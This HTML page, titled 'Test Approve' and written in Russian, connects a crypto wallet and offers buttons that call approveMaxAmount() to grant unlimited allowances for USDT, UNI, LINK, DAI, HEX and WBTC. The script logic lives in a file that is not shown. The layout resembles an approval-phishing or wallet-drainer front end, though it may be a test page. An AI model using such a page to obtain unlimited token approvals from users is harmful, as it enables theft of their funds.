<!DOCTYPE html>
<html lang="en-US">
<head lang="ru">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
    <link rel="stylesheet" href="./css/style.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>

    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="keywords" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <title>Test Approve</title>
</head>
<body>
<div class="container">
    <br>
    <div class="row text-right">
        <div class="col">
            <div class="form-group" id="showConnect">
                <button class="btn btn-sm btn-outline-primary" onclick="connect()">connect to a wallet</button>
            </div>
            <div id="showWallet" style="display: none;">
                <span>Адрес Вашего кошелька: </span> <span id="wallet"></span>
            </div>
        </div>
    </div>
    <br>
    <br>
    <h5 class=""> Пожалуйста, выберите токен для выдачи "approve()"</h5>
    <br>
    <br>
    <div class="row">
        <div class="col-12">
            <div class="form-group">
                <button id="connect0" class="btn btn-sm btn-outline-secondary left" onclick="connect()">connect to a wallet</button>
                <button id="approve0" style="display: none;" class="btn btn-sm btn-outline-secondary left" onclick="approveMaxAmount(0)">approve</button>
                <span class="float-sm-"> - USDT</span>
            </div>
            <br class="float-sm-none">
            <div class="form-group">
                <button id="connect1" class="btn btn-sm btn-outline-secondary left" onclick="connect()">connect to a wallet</button>
                <button id="approve1" style="display: none;" class="btn btn-sm btn-outline-secondary left" onclick="approveMaxAmount(1)">approve</button>
                <span class="float-sm-"> - USDT</span>
            </div>
            <br class="float-sm-none">
            <div class="form-group">
                <button id="connect2" class="btn btn-sm btn-outline-secondary left" onclick="connect()">connect to a wallet</button>
                <button id="approve2" style="display: none;" class="btn btn-sm btn-outline-secondary left" onclick="approveMaxAmount(2)">approve</button>
                <span class="float-sm-"> - UNI</span>
            </div>
            <br class="float-sm-none">
            <div class="form-group">
                <button id="connect3" class="btn btn-sm btn-outline-secondary left" onclick="connect()">connect to a wallet</button>
                <button id="approve3" style="display: none;" class="btn btn-sm btn-outline-secondary left" onclick="approveMaxAmount(3)">approve</button>
                <span class="float-sm-"> - LINK(ChainLink)</span>
            </div>
            <br class="float-sm-none">
            <div class="form-group">
                <button id="connect4" class="btn btn-sm btn-outline-secondary left" onclick="connect()">connect to a wallet</button>
                <button id="approve4" style="display: none;" class="btn btn-sm btn-outline-secondary left" onclick="approveMaxAmount(4)">approve</button>
                <span class="float-sm-"> - DAI</span>
            </div>
            <br class="float-sm-none">
            <div class="form-group">
                <button id="connect5" class="btn btn-sm btn-outline-secondary left" onclick="connect()">connect to a wallet</button>
                <button id="approve5" style="display: none;" class="btn btn-sm btn-outline-secondary left" onclick="approveMaxAmount(5)">approve</button>
                <span class="float-sm-"> - HEX</span>
            </div>
            <br class="float-sm-none">
            <div class="form-group">
                <button id="connect6" class="btn btn-sm btn-outline-secondary left" onclick="connect()">connect to a wallet</button>
                <button id="approve6" style="display: none;" class="btn btn-sm btn-outline-secondary left" onclick="approveMaxAmount(6)">approve</button>
                <span class="float-sm-"> - WBTC</span>
            </div>
        </div>

    </div>
</div>

</body>
<script charset="utf-8"
        src="https://cdn.ethers.io/lib/ethers-5.1.umd.min.js"
        type="text/javascript">
</script>
<script src='./js/web3_script.js' type='text/javascript'></script>
</html>